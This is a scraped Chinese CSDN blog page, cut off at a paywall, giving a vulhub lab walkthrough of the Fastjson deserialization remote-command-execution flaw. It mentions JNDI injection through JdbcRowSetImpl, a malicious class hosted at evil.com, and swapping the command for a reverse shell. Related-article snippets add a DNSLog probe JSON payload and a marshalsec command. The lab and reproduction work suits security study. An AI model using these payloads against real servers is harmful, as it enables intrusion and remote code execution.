21 - vulhub - fastjson 反序列化导致任意命令执行漏洞

最新推荐文章于 2024-08-23 15:07:54 发布
最新推荐文章于 2024-08-23 15:07:54 发布
阅读量2.3k 收藏
点赞数
分类专栏: 程序员 文章标签: 面试 经验分享 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67621628/article/details/123667111
版权
本文详细介绍了如何复现fastjson的反序列化导致的任意命令执行漏洞,包括使用docker-compose启动环境,通过JNDI注入执行命令,涉及Java 8u102的漏洞环境,利用com.sun.rowset.JdbcRowSetImpl的payload,以及在本地和远程服务器上模拟RMI服务器的过程。
摘要由CSDN通过智能技术生成

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep rce

在这里插入图片描述

访问 8090 端口

在这里插入图片描述

[](

)漏洞利用

首先 vulhub 给出的复现提示如下

因为目标环境是Java 8u102,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,

我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。

首先编译并上传命令执行代码,如http://evil.com/TouchFile.class:

[](

)编译 TouchFile.class 文件

这里就利用到了我们本地的 JAVA 环境,我们需要将下面的代码编译成一个 class 文件。

将下面的代码复制到一个文件,然后使用 javac 命令进行编译.

其中的 "touch", "/tmp/success" ,可以替换成自己的反弹shell或者其他命令执行语句,比如

String[] com

最低0.47元/天 解锁文章
Python—欢喜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Vulnhub复现漏洞 - Fastjson 反序列化导致任意命令执行漏洞
JiangBuLiu的博客
07-03 9089
Fastjson 反序列化导致任意命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境生成字节码本环境目录结构解压war漏洞复现生成字节码构造POC漏洞利用本地测试 Vulnhub官方复现教程 https://vulhub.org/#/environments/fastjson/vuln/ 漏洞原理 http://xxlegend.com/2017/04/29/title-%20fas...
vulhub漏洞——fastjson
weixin_45808483的博客
12-05 3692
我们只知道一个IP nmap扫描端口 我们可以看到 8090opsmessaging Xary扫描没有发现漏洞 访问 8090 端口 fastjson反序列化漏洞验证POC DNSLog Platform 获取dnslog burp抓包修改数据包 POST Content-Type: application/json {"zeo":{"@type":"java.net.Inet4Address","val":"m7ds09.dnslog.cn"}} //va.
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-12 3万+
本文是Fastjson1.2.24漏洞复现,包括漏洞原理、漏洞利用(远程创建文件)、漏洞利用(反弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
vulhub复现之fastjson1.2.47漏洞复现
m0_70483044的博客
07-14 2909
目录什么是json?fastjson有啥用?什么是fastjson?json语法规则为什么要引进AutoType?漏洞原理怎么确认存在漏洞的?漏洞复现反弹shell。
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 3282
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列化和反序列化Java对象。当我们在处理日期时间字段时,可能会遇到反序列化时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
本篇将详细介绍如何在Spring Boot中配置Fastjson进行序列化和反序列化,以实现与Redis的高效交互。 Fastjson是阿里巴巴开发的一款高性能的JSON处理库,它提供了快速的序列化和反序列化能力,支持多种Java类型,包括...
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
预警事项:Fastjson反序列化远程代码执行漏洞风险预警
05-24
阿里巴巴发布关于Fastjson安全公告,在1.2.80及以下版本中存在反序列化风险。Fastjson是阿里巴巴的开源JSON解析库,可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到...
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
Vulhub复现fastjson漏洞
人若有志,就不会在半坡停止。
11-08 1022
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为Java对象,Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
Fastjson 1.2.24反序列化漏洞Vulhub)使用方法
R0ot
03-12 895
Fastjson是阿里巴巴的一个开源JSON处理库,它可以实现Java对象与JSON之间的转换。然而,在Fastjson 1.2.24版本中,存在一个反序列化漏洞,攻击者可以通过构造恶意的JSON数据来触发该漏洞,进而执行任意代码,获取服务器敏感信息,甚至控制整个服务器。Vulhub是一个漏洞集成环境,方便安全研究人员进行漏洞复现和研究。本文将介绍如何使用Vulhub来搭建Fastjson 1.2.24反序列化漏洞环境,并演示漏洞的使用方法。
vulhub漏洞复现十四_fastjson
weixin_44193247的博客
01-25 1268
vulhub漏洞复现练习篇
Spring Data Commons 远程命令执行漏洞
m0_63241485的博客
08-17 510
Spring是一个开源框架,它是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅限于服务器端的开发。从简单性、可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。Spring的开发初衷:1、JAVA EE开发应该更加简单。2、使用接口而不是使用类,是更好的编程习惯。Spring将使用接口的复杂度几乎降低到了零。3、为JavaBean提供了一个更好的应用配置框架。...
Fastjson 反序列化漏洞
Cover-3321的博客
01-09 2577
fastjson在解析json(反序列化)的过程中,支持使用@Type来实例化一个具体类,且自动调用这个类的set/get方法来访问属性。黑客通过查找代码中的get方法,来远程加载恶意命令,即造成反序列化漏洞
常见面试问题(Python)
最新发布
jiao_mrswang的博客
08-23 76
5、GIL全局解释锁。
fastjson 1.2.24 反序列化导致任意命令执行漏洞
03-16
漏洞的原因是 fastjson反序列化时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议用户尽快升级 fastjson 版本,或者采取其他安全措施来防范该漏洞的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值